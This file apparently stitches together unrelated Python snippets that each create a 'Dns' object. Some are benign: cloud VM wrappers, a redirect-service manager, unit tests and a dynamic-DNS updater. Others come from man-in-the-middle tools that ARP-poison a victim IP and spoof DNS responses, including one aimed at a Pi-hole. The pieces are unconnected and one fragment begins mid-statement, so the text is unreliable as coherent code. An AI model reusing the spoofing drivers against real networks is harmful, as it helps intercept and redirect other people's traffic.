def DNSCLI(self):
if not self.ARPresult:
print("ARP Poisoning was not completed successfully, please do this first.")
return
print("You are about to replace DNS responses of the Pi-hole with settings: ")
print(" PoisonType: {}".format(self.conf.getPoisonType()))
print(" ReplaceIP: {}".format(self.conf.getReplaceIP()))
print(" SpoofingTimeout: {}".format(self.conf.getSpoofingTimeout()))
inp = input("Do you want to continue? (Y/n): ")
if inp.lower().strip() == "y" or inp.lower().strip() == "yes" or len(inp.strip()) == 0:
# Ask if we should run in verbose mode
verbose = input("Do you want to run in verbose mode? (Y/n): ")
if verbose.lower().strip() == "y" or verbose.lower().strip() == "yes" or len(verbose.strip()) == 0:
self.dns = Dns(self.PiIP, self.conf.getReplaceIP(), self.conf.getPoisonType(), self.conf.getNetworkInterface(), True)
else:
self.dns = Dns(self.PiIP, self.conf.getReplaceIP(), self.conf.getPoisonType(), self.conf.getNetworkInterface(), False)
print("\n")
# Start spoofing
self.dns.poison()
elif inp.lower().strip() == "n" or inp.lower().strip() == "no":
return
else:
print("Invalid answer, please answer Y or N\n")
self.DNSCLI()
return
def manager():
the_config = config.read_redirect_configs()
from_email = the_config.get('mail', 'from')
device_error_email = the_config.get('mail', 'device_error')
activate_url_template = the_config.get('mail', 'activate_url_template')
password_url_template = the_config.get('mail', 'password_url_template')
redirect_domain = the_config.get('redirect', 'domain')
redirect_activate_by_email = the_config.getboolean('redirect',
'activate_by_email')
mock_dns = the_config.getboolean('redirect', 'mock_dns')
if mock_dns:
dns = MagicMock()
else:
statsd_cli = statsd_client(the_config)
dns = Dns(the_config.get('aws', 'access_key_id'),
the_config.get('aws', 'secret_access_key'),
the_config.get('aws', 'hosted_zone_id'), statsd_cli)
create_storage = db_helper.get_storage_creator(the_config)
smtp = mail.get_smtp(the_config)
the_mail = mail.Mail(smtp, from_email, activate_url_template,
password_url_template, device_error_email)
users_manager = services.Users(create_storage, redirect_activate_by_email,
the_mail, dns, redirect_domain)
return users_manager
def __init__(self, machine_name):
self.client = boto3.client('ec2', EC2_CONFIG['region'])
self.ip = ""
self._machine_name = machine_name
self.node = Node(machine_name, NodeSshCommands(self.get_external_ip))
self.dns = Dns(machine_name, DnsSshCommands(self.get_external_ip))
self.traffic = TrafficHandler(machine_name, TrafficSshCommands(self.get_external_ip))
def __init__(self, name, instance_index):
self.name = name
self.instance_index = instance_index
self.executor = Executor()
self.node = Node(name, NodeDockerCommands(name, self.get_external_ip))
self.dns = Dns(name, DnsDockerCommands(name))
self.traffic = TrafficHandler(name, TrafficDockerCommands(name))
def __init__(self, name):
self.ip_pattern = re.compile(r".*value: (.+), time.*")
self.command = "VBoxManage"
self.ip = ""
self.name = name
self.node = Node(name, NodeSshCommands(self.get_external_ip))
self.dns = Dns(name, DnsSshCommands(self.get_external_ip))
self.traffic = TrafficHandler(name,
TrafficSshCommands(self.get_external_ip))
def __init__(self,
machine_name,
project=COMPUTE_CONFIG['project'],
zone=COMPUTE_CONFIG['zone']):
self.compute = googleapiclient.discovery.build('compute', 'v1')
self.project = project
self.zone = zone
self.ip = ""
self._machine_name = machine_name
self.node = Node(machine_name, NodeSshCommands(self.get_external_ip))
self.dns = Dns(machine_name, DnsSshCommands(self.get_external_ip))
self.traffic = TrafficHandler(machine_name,
TrafficSshCommands(self.get_external_ip))
def test_revert_standard(self, mocker, commands, printing):
subject = Dns('standard', self.mock_commands)
self.mock_commands.dns_utility.return_value = ("reverted", "")
subject.revert()
assert self.mock_print.mock_calls == [
mocker.call('\treverting DNS on standard...'),
mocker.call('\tdone.')
]
self.mock_commands.dns_utility.assert_called_with('revert')
assert subject.dns_status == 'reverted'
self.mock_print.reset()
subject.revert()
self.mock_print.assert_called_with('standard already reverted')
def main(args):
"""Setups and starts dns and arp spoofing"""
if os.geteuid():
sys.exit("Hey! Listen! Run as root!")
router = args.router or get_router()
new_site = args.newsite or socket.gethostbyname(socket.gethostname())
victim = args.victim
site = args.site
if not site:
sys.exit("Please enter site. Example: -s test.com")
if not victim:
sys.exit("Please enter victim IP. Example: -v 192.168.0.42")
poison = Arp(router, victim)
poison.setup()
poison.start()
spoof = Dns(site, new_site)
spoof.setup()
# This is blocking
spoof.start()
poison.stop()
sys.exit(0)
def test_construction(self):
subject = Dns('nodename', 'commands')
assert subject.machine_name() == 'nodename'
assert subject.dns_commands == 'commands'
assert subject.dns_status == ''
class HTTPHandler(BaseHTTPRequestHandler):
'''handle the htpp request'''
_dns = Dns(PROPS.get('region'), PROPS.get('key'), PROPS.get('secret'))
_addr_record = {}
_record_ip = {}
def do_GET(self):
'''处理GET请求'''
# easy to use
dns = HTTPHandler._dns
addr_record = HTTPHandler._addr_record
record_ip = HTTPHandler._record_ip
html = 'sucess'
# resolve request info: client ip and request params
request_ip = str(self.client_address[0])
query_str = self.path[2:].strip().split('&')
params = {} # request parameters dictionary
for param in query_str:
key_val = param.strip().split('=')
if len(key_val) > 1:
params[key_val[0]] = key_val[1]
else:
params[key_val[0]] = ''
token = params.get('token') # verify is the token valide
record = params.get('record')
host = params.get('host')
domain = params.get('domain')
if not token or token != PROPS.get('token'):
html = 'invalid request'
elif not host:
html = 'dns host is necessary'
else:
if not record: # get record
if not domain:
self.response_content('missing dns record and domain')
return
host_domain = '%s.%s' % (host, domain)
if addr_record.has_key(host_domain):
record = addr_record.get(host_domain)
else:
record = self._dns.get_dns_record(host, domain)
if record:
# add in address record dictionary
addr_record[host_domain] = record
else:
record = self._dns.add_dns_record(
host, domain, request_ip)
addr_record[host_domain] = record
# passed = 0 # don't have this record in ali dns server
# update dns record
try:
if not record_ip.has_key(record):
record_ip[record] = dns.get_dns_ip(
record) # get dns ip and store it
if record_ip[record] != request_ip:
dns.update(record, host, request_ip)
record_ip[record] = request_ip
except Exception, ex:
html = 'failure:' + str(ex)
self.response_content(html)
"[*] Victim IP:",
colors.GREEN + net.get_victim_ip() + colors.DEFAULT))
except KeyboardInterrupt:
print("\r")
print(colors.RED + "\n[!] Quitting.." + colors.DEFAULT)
sys.exit(0)
try:
# ARP poison
arp = Arp(net.get_gateway_ip(), net.get_victim_ip(),
net.get_interface())
arp.setup_mac()
# DNS spoofing
dns = Dns(net.get_attacker_ip())
# Let's start thread of both
print(colors.WHITE + "\n[*] Starting ARP poisoning.." + colors.DEFAULT)
poisonThread = threading.Thread(target=arp.poison)
print(colors.WHITE + '[*] Spoofing DNS responses...' + colors.DEFAULT)
dnsThread = threading.Thread(target=dns.spoof)
poisonThread.daemon = True
dnsThread.daemon = True
except KeyboardInterrupt:
print("\r")
print(colors.RED + "\n[!] Quitting.." + colors.DEFAULT)
sys.exit(0)